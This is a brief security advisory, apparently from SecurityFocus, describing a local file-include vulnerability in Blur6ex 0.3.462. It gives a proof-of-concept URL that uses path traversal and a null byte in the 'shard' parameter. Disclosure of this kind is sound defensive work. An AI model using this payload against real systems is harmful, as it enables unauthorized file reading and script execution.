source: https://www.securityfocus.com/bid/17554/info

Blur6ex is prone to a local file-include vulnerability that may allow an unauthorized user to view files and to execute local scripts.

http://www.example.com/blur6ex-0.3.462/index.php?shard=/../../../../../[local-file]%00